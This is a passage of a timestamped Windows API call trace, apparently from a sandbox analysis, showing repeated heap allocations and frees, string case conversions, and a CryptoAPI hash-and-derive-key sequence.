lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.956] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.956] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.956] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.956] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.956] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0252.956] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.957] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0252.957] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.957] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0252.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0252.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.957] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0252.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.957] CryptCreateHash (in: hProv=0xad31c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0252.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0252.958] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.958] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.958] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.959] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.959] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0252.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0252.960] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0252.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0252.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.960] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0252.960] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.960] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.961] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.961] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.961] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0252.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0252.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.961] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0252.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.961] CryptHashData (hHash=0xaa5660, pbData=0x24b1798, dwDataLen=0x3, dwFlags=0x1) returned 1 [0252.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.962] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.962] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.962] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0252.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0252.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0252.963] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.963] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.963] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.963] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.963] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.963] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0252.963] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.964] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0252.964] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.964] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0252.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.964] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.964] CryptDeriveKey (in: hProv=0xad31c0, Algid=0x6601, hBaseData=0xaa5660, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa57a0) returned 1 [0252.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0252.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.967] HeapFree 